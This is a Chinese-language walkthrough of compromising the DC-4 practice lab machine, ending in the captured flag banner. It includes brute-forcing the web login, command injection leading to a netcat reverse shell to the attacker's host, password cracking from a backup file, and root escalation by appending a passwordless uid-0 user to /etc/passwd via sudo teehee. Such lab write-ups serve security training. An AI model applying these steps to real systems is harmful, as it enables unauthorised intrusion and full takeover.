渗透测试：靶机DC-4练习实录

一、信息扫描部分省略

二、破解登录密码

• 通过扫描，端口只有22,80开放，浏览器打开首页，就是一个登录界面。
• 尝试通过BurpSuite暴力破解。用/usr/share/john/password.lst作为字典。
• 可以得到：user: admin pass: happy

三、登录进去后，可以通过网页执行命令。

• 还是用BurpSuite重复发送命令。
• 通过实验可知，命令和参数之间用+号连接。
• 执行nc 10.0.0.21 666 -e /bin/bash，通过在Kali本机监听，得到shell。

四、密码暴破

• 在家目录里可以看到三个用户：

  • charles
  • jim
  • sam

• root@dc-4:/home/jim/backups# ls
  old-passwords.bak
  

• 在这个目录里可以看到这个密码文件，用这个密码文件可以破解jim的密码。

• 通过SSH登录后，可以看到一个邮件。邮件里有charles的密码。同样用charles账户SSH登录。

charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

• 这里就可以通过teehee命令做点事情。

echo zylee::0:0:::/bin/bash | sudo teehee -a /etc/passwd

用户名-zylee
是否有密码保护—空  # 表示没有密码
uid—0     # 给root权限
用户信息记录位置—不写
家目录—不写
登录的命令解释器–/bin/bash

• 完了之后，可以直接用su切换到zylee用户，也就拥有了root权限。在根目录下，直接发现flag。

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.